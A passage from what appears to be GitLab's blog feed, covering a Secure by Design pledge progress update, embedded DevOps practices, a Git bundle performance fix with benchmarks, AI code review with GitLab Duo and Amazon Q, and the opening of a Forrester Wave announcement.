<p><em><strong>Goal: Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP).</strong></em></p>
<p>GitLab maintains a strong bug bounty program through <a href="https://hackerone.com/gitlab?type=team">HackerOne</a>, a <a href="https://gitlab.com/.well-known/security.txt">security.txt</a> file highlighting GitLab’s preferred and additional disclosure processes, and <a href="https://about.gitlab.com/releases/categories/releases/">release posts</a> highlighting security fixes.</p>
<p>Customers and the general public can subscribe to receive GitLab’s release posts directly in their email inbox.</p>
<h3>Common vulnerability enumerations</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate transparency in vulnerability reporting</strong></em></p>
<p>GitLab includes the Common Weakness Enumeration (CWE) field in all Common vulnerability enumerations (CVE) records it publishes. Over the past year, GitLab has iterated to also include the Common Platform Enumeration (CPE) field in CVE records.</p>
<p>The GitLab <a href="https://gitlab.com/gitlab-org/cves">CVE assignments project</a> stores a copy of all CVE identifiers assigned and published by GitLab in its role as a CVE Numbering Authority.</p>
<blockquote>
<p>Check out <a href="https://gitlab.com/gitlab-org/cves/-/blob/master/.gitlab/issue_templates/Internal%20GitLab%20Submission.md?ref_type=heads">GitLab’s CVE submission template</a>.</p>
</blockquote>
<h3>Evidence of intrusions</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.</strong></em></p>
<p>GitLab has published an <a href="https://docs.gitlab.com/ee/security/responding_to_security_incidents.html">incident response guide</a> to help customers respond to incidents involving GitLab instances. Additionally, GitLab has open sourced versions of its <a href="https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/">GUARD detection-as-code</a> and TLDR threat detection frameworks. The repositories for those open source frameworks can be found on <a href="https://about.gitlab.com/security/open-source-resources/">GitLab’s Open Source Security Center</a>.</p>
<p>In a similar manner, GitLab is adding functionality to its <a href="http://gitLab.com">GitLab.com</a> service offering to <a href="https://about.gitlab.com/blog/introducing-compromised-password-detection-for-gitlab-com/">detect compromised passwords</a> for all logins using GitLab’s native username and password authentication method.</p>
<h2>What's next</h2>
<p><a href="https://gitlab.com/gitlab-com/gl-security">GitLab’s Security Division’s mission</a> is to enable everyone to innovate and succeed on a safe, secure, and trusted DevSecOps platform.</p>
<p>GitLab's security enhancements over the past year have allowed us to demonstrate our commitment to CISA’s Secure by Design Pledge, and they have strengthened our platform and given customers a more reliable and secure foundation to build on.</p>
<p>Our commitment to iteration means we're already focused on the next set of innovations that will drive us forward.</p>
<blockquote>
<p>To learn more about GitLab’s security enhancements, bookmark our <a href="https://about.gitlab.com/blog/categories/security/">security page on the GitLab Blog</a>.</p>
</blockquote>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/">Secure by Design principles meet DevSecOps innovation in GitLab 17</a></li>
<li><a href="https://about.gitlab.com/blog/happy-birthday-secure-by-design/">Happy birthday, Secure by Design!</a></li>
<li><a href="https://about.gitlab.com/the-source/security/strengthen-your-cybersecurity-strategy-with-secure-by-design/">Strengthen your cybersecurity strategy with Secure by Design</a></li>
</ul>
]]></content>
        <author>
            <name>Joseph Longo</name>
            <uri>https://about.gitlab.com/blog/authors/joseph-longo</uri>
        </author>
        <published>2025-06-09T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[4 ways to accelerate embedded development with GitLab]]></title>
        <id>https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/"/>
        <updated>2025-06-05T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Software in embedded systems is no longer just a part number — it's a critical differentiator. This shift has led to enormous complexity in the firmware running in our cars, airplanes, and industrial machines. The number of lines of code in the average car is expected to reach <a href="https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/">650 million</a> by the end of 2025, up from 200 million just five years ago. In aerospace systems, the complexity of embedded software has nearly <a href="https://www.mckinsey.com/industries/aerospace-and-defense/our-insights/debugging-the-software-talent-gap-in-aerospace-and-defense">doubled every four years</a> for the last several decades.</p>
<p>Traditional embedded development approaches cannot effectively handle the software challenges of modern machines. This shortcoming slows engineers down, in part, by exacerbating challenges such as:</p>
<ul>
<li><a href="#challenge-1-hardware-testing-bottlenecks">Hardware testing bottlenecks</a></li>
<li><a href="#challenge-2-inconsistent-build-environments">Inconsistent build environments</a></li>
<li><a href="#challenge-3-siloed-development-practices">Siloed development practices</a></li>
<li><a href="#challenge-4-manual-functional-safety-compliance-processes">Manual functional safety compliance processes</a></li>
</ul>
<p>Embedded developers need a new approach to deal with the rapid increase in code. In this article, we’ll explain four ways you can use the GitLab AI-native DevSecOps platform to shorten feedback loops, work collaboratively and iteratively, and streamline compliance.</p>
<h2>Challenge 1: Hardware testing bottlenecks</h2>
<p>Unlike enterprise software that can run on virtually any cloud server, embedded automotive software must be tested on specialized hardware that precisely matches production environments. Traditional hardware-in-the-loop (HIL) testing processes often follow this pattern:</p>
<ol>
<li>Developers write code for an embedded system (e.g., an electronic control unit)</li>
<li>They request access to limited, expensive hardware test benches (costing $500,000-$10M each)</li>
<li>They wait days or weeks for their scheduled access window</li>
<li>They manually deploy and test their code on physical hardware at their desks</li>
<li>They document results, pass the hardware to the next developer, and go to the back of the hardware testing queue</li>
</ol>
<p>This process is extremely inefficient. Embedded developers may finish writing their code today and wait weeks to test it on a hardware target. By then, they've moved on to other tasks. This context switching drains productivity. Not only that, developers may wait weeks to learn they had a simple math error in their code.</p>
<h3>Solution: Automated hardware allocation and continuous integration</h3>
<p>You can streamline hardware testing through automation using the <a href="https://gitlab.com/guided-explorations/embedded/ci-components/device-cloud">GitLab On-Premises Device Cloud</a>, a CI/CD component. This lets you automate the orchestration of scarce hardware resources, turning a manual, time-intensive process into a streamlined, continuous workflow.</p>
<p>The On-Premises Device Cloud:</p>
<ol>
<li>Creates pools of shared hardware resources</li>
<li>Automatically — and exclusively — allocates hardware to a developer’s hardware testing pipeline tasks based on availability</li>
<li>Deploys and executes tests without manual intervention</li>
<li>Collects and reports results through integrated pipelines</li>
<li>Automatically deallocates hardware back into the “available” pool</li>
</ol>
<p>After submitting code, you’ll receive results in hours instead of days, often without ever physically touching the test hardware.</p>
<p>What this video for an introduction to the GitLab On-Premises Device Cloud CI/CD Component to orchestrate the remote allocation of shared hardware for HIL:</p>
<p>&lt;!-- blank line --&gt;
&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/ltr2CIM9Zag?si=NOij3t1YYz4zKajC&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<p>You can also adopt multi-pronged testing strategies that balance speed and quality. Bring the following embedded test patterns and environments into automated GitLab CI pipelines:</p>
<ul>
<li><strong>Software-in-the-loop (SIL):</strong> Testing on virtual hardware simulators for quicker initial feedback</li>
<li><strong>Processor-in-the-loop (PIL):</strong> Testing on representative processor hardware for faster feedback at a lower cost</li>
<li><strong>Hardware-in-the-loop (HIL):</strong> Testing on full production-equivalent hardware and test benches for late-stage verification</li>
</ul>
<p>By automating the orchestration of these tests within CI pipelines, you’ll be able to identify issues earlier, iterate faster, and accelerate time to market.</p>
<h2>Challenge 2: Inconsistent build environments</h2>
<p>Another significant challenge in embedded development is build environment inconsistency. Embedded developers often manually execute builds on their local machines with varying configurations, compiler versions, and dependencies. Then they’ll paste the binaries from their local build to a shared codebase.</p>
<p>This approach creates several problems:</p>
<ul>
<li><strong>Inconsistent outputs:</strong> Builds for the same source code produce different results on different machines</li>
<li><strong>&quot;Works on my machine&quot; syndrome:</strong> Code that builds locally fails in shared environments</li>
<li><strong>Poor traceability:</strong> Limited audit trail of who built what and when</li>
<li><strong>Knowledge silos:</strong> Build expertise becomes concentrated in a few individuals</li>
</ul>
<p>This approach can lead to errors, bottlenecks, and costly delays.</p>
<h3>Solution: Standardized build automation</h3>
<p>You can address these challenges by implementing standardized build automation within CI/CD pipelines in GitLab. This approach creates consistent, repeatable, container-based build environments that eliminate machine-specific variations. Through the use of special Embedded Gateway Runner provisioning scripts, containers can interface with hardware for flashing and port monitoring for automated testing.</p>
<p>Key elements of this solution include:</p>
<ul>
<li><strong>Lifecycle managed environments:</strong> Define complex embedded simulation environments as code; automatically deploy environments for testing and destroy them afterward</li>
<li><strong>Containerization:</strong> Use Docker containers to ensure identical build environments</li>
<li><strong>Automated dependency management:</strong> Control and version all dependencies</li>
<li><strong>Central build execution:</strong> Run builds on shared infrastructure rather than local machines</li>
</ul>
<blockquote>
<p>Follow this tutorial to learn <a href="https://gitlab.com/guided-explorations/embedded/workshops/embedded-devops-workshop-refactoring-to-ci/-/blob/main/TUTORIAL2.md%20">how to automate embedded software builds within a GitLab CI pipeline</a>.</p>
</blockquote>
<p>By standardizing and automating the build process, you can ensure that every build follows the same steps with the same dependencies, producing consistent outputs regardless of who initiated it. This not only improves quality but also democratizes the build process, enabling more team members to participate without specialized knowledge.</p>
<h2>Challenge 3: Siloed development practices</h2>
<p>Enterprise development teams have widely adopted collaborative practices such as DevOps, underpinned by shared source code management (SCM) and continuous integration/continuous delivery (CI/CD) systems. Embedded developers, on the other hand, have historically worked alone at their desks. There are valid technical reasons for this.</p>
<p>For example, consider hardware virtualization, which is a key enabler of DevOps automation. The industry has been slower to virtualize the massive range of specialized processors and boards used in embedded systems. This is due in large part to the difficulties of virtualizing production real-time systems and the associated lack of economic incentives. Compare that to cloud virtualization which has been commoditized and benefited enterprise SaaS development for over a decade.</p>
<p>Many providers are now embracing virtualization-first for the sake of speeding up embedded development. If teams fail to adopt virtual testing options, however, their silos will remain and negatively impact the business through:</p>
<ul>
<li><strong>Knowledge fragmentation</strong>: Critical insights remain scattered across individuals and teams</li>
<li><strong>Redundant development</strong>: Multiple teams solve identical problems, creating inconsistencies</li>
<li><strong>Late-stage discovery during big-bang integrations</strong>: Problems are found late in the process when multiple developers integrate their code at once, when errors are more costly to fix</li>
<li><strong>Stifled innovation</strong>: Solutions from one domain rarely influence others, hampering the development of new product ideas</li>
</ul>
<h3>Solution: Collaborative engineering through a unified platform</h3>
<p>An important step in breaking down these silos is to standardize embedded development around GitLab’s unified DevSecOps platform. In this regard, GitLab is aligned with the shift of embedded systems toward more consolidated, shared platforms on embedded devices. GitLab enables:</p>
<ul>
<li><strong>Shared visibility:</strong> Make all code, Issues, and documentation visible across teams</li>
<li><strong>Collaborative workflows:</strong> Enable peer review and knowledge sharing through merge requests</li>
<li><strong>Centralized knowledge:</strong> Maintain a single source of truth for all development artifacts</li>
<li><strong>Asynchronous collaboration:</strong> Allow teams to work together across different locations and time zones</li>
</ul>
<p>Human-AI agent collaboration is a fundamental ingredient to fueling the customer-facing innovations that digital natives and established embedded brands desire. GitLab enables human-AI collaboration as well. By creating transparency across the development lifecycle, GitLab changes embedded development from an isolated activity to a collaborative practice. Engineers can see each other's work in progress, learn from collective experiences, and build upon shared solutions.</p>
<p>Watch this presentation from Embedded World Germany 2025, which explains the power of embedded developers collaborating and sharing “work in progress”. The demo portion from 24:42 to 36:51 shows how to integrate HIL into a GitLab CI pipeline and enable collaborative development.</p>
<p>&lt;!-- blank line --&gt;
&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/F_rlOyq0hzc?si=eF4alDY6HK98uZPj&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<p>Perhaps most importantly, by achieving greater collaboration through DevSecOps, teams can unlock embedded systems innovations that would otherwise remain hidden. Indeed, collaboration fuels innovation. <a href="https://www.sciencedirect.com/science/article/abs/pii/S0749597800928887">One study</a>, for example, found that group brainstorming, when properly structured, can lead to more innovative and creative outcomes than individuals working alone. Collaborative development is crucial in the race to develop software-defined products.</p>
<h2>Challenge 4: Manual functional safety compliance processes</h2>
<p>Embedded systems in the automotive and aerospace industries must comply with rigorous functional safety standards, including ISO 26262, MISRA C/C++, DO-178C, and DO-254. Traditional compliance approaches involve manual reviews, extensive documentation, and separate verification activities that occur late in the development cycle. This often creates security review bottlenecks. When specialized embedded security and code quality scanners detect vulnerabilities in a developer’s code, the scan issue gets added to a pile of other issues that haven’t been resolved. Developers can’t integrate their code, and security personnel need to wade through a backlog of code violations. This creates delays and makes compliance more difficult.</p>
<p>Some of the challenges can best be summed up as:</p>
<ul>
<li><strong>Late-stage compliance issues</strong>: Problems discovered after development is complete</li>
<li><strong>Documentation burden</strong>: Extensive manual effort to create and maintain compliance evidence</li>
<li><strong>Process bottlenecks</strong>: Serial compliance activities that block development progress</li>
<li><strong>Expertise dependence</strong>: Reliance on limited specialists for compliance activities</li>
</ul>
<p>As a result, teams often need to choose between velocity and compliance — a precarious trade-off in safety-critical systems.</p>
<h3>Solution: Automated functional safety compliance workflow building blocks</h3>
<p>Rather than treating security and compliance as post-development verification activities, you can codify compliance requirements and enforce them automatically through <a href="https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/">customizable frameworks in GitLab</a>. To do this for functional safety standards, in particular, you can integrate GitLab with specialized embedded tools, which provide the depth of firmware scanning required by functional safety standards. Meanwhile, GitLab provides automated compliance checks, full audit trails, and merge request gating — all features needed to support a robust continuous compliance program.</p>
<p>This integrated approach includes:</p>
<ul>
<li><strong>Compliance-as-code:</strong> Define compliance requirements as automated checks</li>
<li><strong>Integrated specialized tools:</strong> Connect tools like CodeSonar into the DevSecOps platform for automotive-specific compliance</li>
<li><strong>Continuous compliance verification:</strong> Verify requirements throughout development</li>
<li><strong>Automated evidence collection:</strong> Gather compliance artifacts as a by-product of development</li>
</ul>
<p>Watch this video to learn how to use Custom Compliance Frameworks in GitLab to create your own compliance policies. You can create compliance policies related to any standard (e.g., ISO 26262) and automatically enforce those policies in GitLab.</p>
<p>&lt;!-- blank line --&gt;
&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/S-FQjzSyVJw?si=0UdtGNuugLPG0SLL&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<p>By shifting compliance left and embedding it within normal development workflows, you can maintain safety standards without sacrificing velocity. Automated checks catch issues early when they're easier and less expensive to fix, while continuous evidence collection reduces the documentation burden.</p>
<h2>Realizing the power of embedded DevOps</h2>
<p>Embedded development is changing fast. Teams that remain stuck in manual processes and isolated workflows will find themselves increasingly left behind, while those that embrace automated, collaborative practices will define the future of software-defined smart systems.</p>
<p>Explore our <a href="https://gitlab.com/guided-explorations/embedded/workshops/embedded-devops-workshop-refactoring-to-ci">Embedded DevOps Workshop</a> to start automating embedded development workflows with GitLab, or <a href="https://content.gitlab.com/viewer/0a35252831bd130f879b0725738f70ed">watch this presentation from GitLab's Field Chief Cloud Architect</a> to learn how leading organizations are bringing hardware-in-the-loop testing into continuous integration workflows to accelerate embedded development.</p>
<h2>Learn more</h2>
<ul>
<li><a href="https://content.gitlab.com/viewer/438451cba726dd017da7b95fd0fb1b59">Why GitLab Premium with Duo for embedded systems development?</a></li>
<li><a href="https://content.gitlab.com/viewer/87f5104c26720e2c0d73a6b377522a44">Why GitLab Ultimate with Duo for embedded systems development?</a></li>
<li><a href="https://content.gitlab.com/viewer/e59c40099d5e3c8f9307afb27c4a923f">More embedded development systems presentations from GitLab</a></li>
</ul>
]]></content>
        <author>
            <name>Matt DeLaney</name>
            <uri>https://about.gitlab.com/blog/authors/matt-delaney</uri>
        </author>
        <author>
            <name>Darwin Sanoy</name>
            <uri>https://about.gitlab.com/blog/authors/darwin-sanoy</uri>
        </author>
        <published>2025-06-05T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[How we decreased GitLab repo backup times from 48 hours to 41 minutes]]></title>
        <id>https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/</id>
        <link href="https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/"/>
        <updated>2025-06-05T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Repository backups are a critical component of any robust disaster recovery strategy. However, as repositories grow in size, the process of creating reliable backups becomes increasingly challenging.  Our own <a href="https://gitlab.com/gitlab-org/gitlab">Rails repository</a> was taking 48 hours to back up — forcing impossible choices between backup frequency and system performance. We wanted to tackle this issue for our customers and for our own users internally.</p>
<p>Ultimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, <strong>reducing backup times exponentially</strong>. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.</p>
<p>This turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it.</p>
<h2>Backup at scale</h2>
<p>First, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:</p>
<ul>
<li><strong>Time-prohibitive backups:</strong> For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups.</li>
<li><strong>Resource intensity:</strong> Extended backup processes can consume substantial server resources, potentially impacting other operations.</li>
<li><strong>Backup windows:</strong> Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.</li>
<li><strong>Increased failure risk:</strong> Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.</li>
<li><strong>Race conditions:</strong> Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.</li>
</ul>
<p>These challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.</p>
<p>Now, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.</p>
<h2>The technical challenge</h2>
<p>GitLab's repository backup functionality relies on the <a href="https://git-scm.com/docs/git-bundle"><code>git bundle create</code></a> command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.</p>
<p>However, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased exponentially. In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.</p>
<h3>Root cause analysis</h3>
<p>To identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097176/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097176388.jpg" alt="Flame graph showing command during execution"></p>
<p>A flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.</p>
<p>When examining the flame graph of <code>git bundle create</code> running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the <code>object_array_remove_duplicates()</code> function. This function was introduced to Git in the <a href="https://gitlab.com/gitlab-org/git/-/commit/b2a6d1c686">commit b2a6d1c686</a> (bundle: allow the same ref to be given more than once, 2009-01-17).</p>
<p>To understand this change, it's important to know that <code>git bundle create</code> allows users to specify which references to include in the bundle. For complete repository bundles, the <code>--all</code> flag packages all references.</p>
<p>The commit addressed a problem where users providing duplicate references through the command line – such as <code>git bundle create main.bundle main main</code> - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested <code>for</code> loops that iterate through all references to identify duplicates. This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.</p>
<h3>The fix: From O(N²) to efficient mapping</h3>
<p>To resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.</p>
<p>This change dramatically enhances the performance of <code>git bundle create</code> and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 10,000 references demonstrates a 6x performance improvement.</p>
<pre><code class="language-shell">Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ): 	14.653 s ±  0.203 s	[User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s	10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):  	2.394 s ±  0.023 s	[User: 1.684 s, System: 0.798 s]
  Range (min … max):	2.364 s …  2.425 s	10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
	6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)
</code></pre>
<p>The patch was accepted and <a href="https://gitlab.com/gitlab-org/git/-/commit/bb74c0abbc31da35be52999569ea481ebd149d1d">merged</a> into upstream Git. At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.</p>
<h2>The result: Dramatically decreased backup times</h2>
<p>The performance gains from this improvement have been nothing short of transformative:</p>
<ul>
<li><strong>From 48 hours to 41 minutes:</strong> Creating a backup of our largest repository (<code>gitlab-org/gitlab</code>) now takes just 1.4% of the original time.</li>
<li><strong>Consistent performance:</strong> The improvement scales reliably across repository sizes.</li>
<li><strong>Resource efficiency:</strong> We significantly reduced server load during backup operations.</li>
<li><strong>Broader applicability:</strong> While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.</li>
</ul>
<h2>What this means for GitLab customers</h2>
<p>For GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:</p>
<ul>
<li><strong>Transformed backup strategies</strong>
<ul>
<li>Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.</li>
<li>Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.</li>
</ul>
</li>
<li><strong>Enhanced business continuity</strong>
<ul>
<li>With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.</li>
</ul>
</li>
<li><strong>Reduced operational overhead</strong>
<ul>
<li>Less server resource consumption and shorter maintenance windows.</li>
<li>Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.</li>
</ul>
</li>
<li><strong>Future-proofed infrastructure</strong>
<ul>
<li>Growing repositories no longer force difficult choices between backup frequency and system performance.</li>
<li>As your codebase expands, your backup strategy can scale seamlessly alongside it</li>
</ul>
</li>
</ul>
<p>Organizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.</p>
<p>Starting with the <a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/">GitLab 18.0</a> release, all GitLab customers regardless of their license tier can already fully take advantage of these improvements for their <a href="https://docs.gitlab.com/administration/backup_restore/backup_gitlab/">backup</a> strategy and execution. There is no further change in configuration required.</p>
<h2>What's next</h2>
<p>This breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement of 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.</p>
<p>We're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.</p>
<blockquote>
<p>Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. <a href="https://about.gitlab.com/eighteen/">Register today!</a></p>
</blockquote>
]]></content>
        <author>
            <name>Karthik Nayak</name>
            <uri>https://about.gitlab.com/blog/authors/karthik-nayak</uri>
        </author>
        <author>
            <name>Manuel Kraft</name>
            <uri>https://about.gitlab.com/blog/authors/manuel-kraft</uri>
        </author>
        <published>2025-06-05T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Accelerate code reviews with GitLab Duo and Amazon Q]]></title>
        <id>https://about.gitlab.com/blog/accelerate-code-reviews-with-gitlab-duo-and-amazon-q/</id>
        <link href="https://about.gitlab.com/blog/accelerate-code-reviews-with-gitlab-duo-and-amazon-q/"/>
        <updated>2025-06-02T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Code reviews are critical for catching bugs, improving code readability, and maintaining coding standards, but they can also be a major bottleneck in your workflow. When you're trying to ship features quickly, waiting for multiple team members to review your code can be frustrating. The back-and-forth discussions, the scheduling conflicts, and the time it takes to get everyone aligned can stretch what should be a simple review into days or even weeks.</p>
<p>Here's where <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q</a>, our new offering that delivers agentic AI throughout the software development lifecycle for AWS customers, comes in to transform your review process. This intelligent, AI-powered solution can perform comprehensive code reviews for you in a fraction of the time it would take your human colleagues. By leveraging advanced agentic AI capabilities, GitLab Duo with Amazon Q streamlines your entire review workflow without sacrificing the quality and thoroughness you need. Think of it as having an always-available, highly skilled reviewer who can instantly analyze your code and provide actionable feedback.</p>
<h2>How it works: Launching a code review</h2>
<p>So how does GitLab Duo with Amazon Q actually work? Let's say you've just finished working on a feature and created a merge request with multiple code updates. Instead of pinging your teammates and waiting for their availability, you simply enter a quick command in the comment section: &quot;/q review&quot;. That's it – just those two words trigger the AI to spring into action.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097002/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097002096.png" alt="Triggering a code review using GitLab Duo with Amazon Q"></p>
<p>Once you've entered the command, Amazon Q Service immediately begins analyzing your code changes. You'll see a confirmation that the review is underway, and within moments, the AI is examining every line of your updates, checking for potential issues across multiple dimensions.
When the review completes, you receive comprehensive feedback that covers all the bases: bug detection, readability improvements, syntax errors, and adherence to your team's coding standards. The AI doesn't just point out problems, it provides context and suggestions for fixing them, making it easy for you to understand what needs attention and why.</p>
<p>The beauty of this agentic AI approach is that it handles the heavy lifting of code review while you focus on what matters most: building great software. You get the benefits of thorough code reviews — better bug detection, consistent coding standards, and improved code quality — without the time sink. Your deployment times shrink dramatically because you're no longer waiting in review queues, and your entire team becomes more productive.</p>
<h2>Why use GitLab Duo with Amazon Q?</h2>
<p>GitLab Duo with Amazon Q transforms your development workflow in the following ways:</p>
<ul>
<li>Lightning-fast code reviews that don't compromise on quality</li>
<li>Consistent application of coding standards across your entire codebase</li>
<li>Immediate feedback that helps you fix issues before they reach production</li>
<li>Reduced deployment times that let you ship features faster</li>
<li>More time for your team to focus on creative problem-solving instead of repetitive reviews</li>
</ul>
<p>Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can revolutionize your code review process:</p>
<p>&lt;!-- blank line --&gt;
&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/4gFIgyFc02Q?si=GXVz--AIrWiwzf-I&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<blockquote>
<p>To learn more about GitLab Duo with Amazon Q visit us at an upcoming <a href="https://about.gitlab.com/events/aws-summits/">AWS Summit in a city near you</a> or <a href="https://about.gitlab.com/partners/technology-partners/aws/#form">reach out to your GitLab representative</a>.</p>
<p>And make sure to join the GitLab 18 virtual launch event to learn about our agentic AI plans and more. <a href="https://about.gitlab.com/eighteen/">Register today!</a></p>
</blockquote>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-06-02T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab named a Leader in The Forrester Wave™: DevOps Platforms, Q2 2025]]></title>
        <id>https://about.gitlab.com/blog/gitlab-named-a-leader-in-the-forrester-wave-devops-platforms-q2-2025/</id>
        <link href="https://about.gitlab.com/blog/gitlab-named-a-leader-in-the-forrester-wave-devops-platforms-q2-2025/"/>
        <updated>2025-06-02T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Choosing a DevSecOps platform is one of the biggest technology decisions enterprises make. That's why we are thrilled to be named a <a href="https://about.gitlab.com/forrester-wave-devops-platform/"><strong>Leader in The Forrester Wave™: DevOps Platforms, Q2 2025</strong></a>, receiving the highest scores possible across the criteria our customers tell us they care about most, including day zero experience, developer tooling, build automation and CI, deployment automation, AI risk mitigation, AI infusion, directly incorporated security tools, and platform cohesion.</p>
<p><em><strong>&quot;GitLab is the most all-in-one of the all-in-one solutions and suits enterprises looking to standardize with a single purchase.” -</strong></em> Forrester Wave™: DevOps Platforms, Q2 2025</p>
<p>For us, this recognition reflects what we've been hearing from customers: They need to deliver secure software faster, but existing solutions force them to compromise on speed, security, or simplicity. GitLab delivers all three. And with our <a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/">GitLab 18.0 release</a> in May, we’ve taken this a step further by <a href="https://about.gitlab.com/blog/gitlab-premium-with-duo/">including AI-native GitLab Duo capabilities</a> — such as test generation, code suggestions, and code refactoring — directly in GitLab Premium and GitLab Ultimate at no additional cost.</p>
<blockquote>
<p><a href="https://about.gitlab.com/forrester-wave-devops-platform/">Access the report today!</a></p>
</blockquote>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673518/Blog/Content%20Images/Image_DevOps-Platforms-Q2-2025.png" alt=" Forrester Wave™: DevOps Platforms, Q2 2025 graphic "></p>
<h2>Staying at the forefront of AI transformation, with enterprise control</h2>
<p>DevSecOps is rapidly evolving, with AI at the forefront of that change. Unfortunately, many AI tools force a choice: cutting-edge capabilities or enterprise security.</p>
